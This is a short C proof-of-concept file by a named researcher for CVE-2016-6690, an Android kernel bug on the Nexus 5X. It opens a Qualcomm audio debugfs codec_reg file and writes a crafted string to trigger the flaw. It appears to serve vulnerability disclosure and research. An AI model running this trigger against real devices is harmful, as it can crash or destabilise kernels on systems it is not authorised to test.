/*
 * https://code.google.com/p/android/issues/detail?id=210209
 * https://source.android.com/security/bulletin/2016-10-01.html, CVE-2016-6690
 *
 * test the poc on nexus 5x with 
 * fingerprint : google/bullhead/bullhead:6.0.1/MTC19T/2741993:user/release-keys
 *
 * Author: Gengjia Chen (chengjia4574@gmail.com)
 * Time: 20161012
*/

#include <sys/wait.h>
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <errno.h>
#include <fcntl.h>
#include <sys/mman.h>
#include <asm/ioctl.h>

int test_write(int fd)
{
#define SIZE 32  
	int ret;
	char buf[SIZE] = {0};
	sprintf(buf, "%x %x",0x1111111, 0x2222222);

	ret = write(fd, buf, SIZE);
	if(ret<0) {
		printf("write fail %s\n",strerror(errno));
	} else printf("succ write %d byte\n",ret);
	return 0;
}

	int
main(int argc, char *argv[])
{
	int ret;
	//char* path = "/sys/kernel/debug/asoc/msm8994-tomtom-snd-card/snd-soc-dummy/codec_reg";
	char* path = "/sys/kernel/debug/asoc/msm8994-tomtom-mtp-snd-card/snd-soc-dummy/codec_reg";
	int fd;
	fd = open(path, O_RDWR);
	if(fd<0) {
		printf("open %s fail %s\n",path, strerror(errno));
		return -1;
	}
	printf("open %s succ\n",path);
	test_write(fd);	
	close(fd);

	return 0;
}
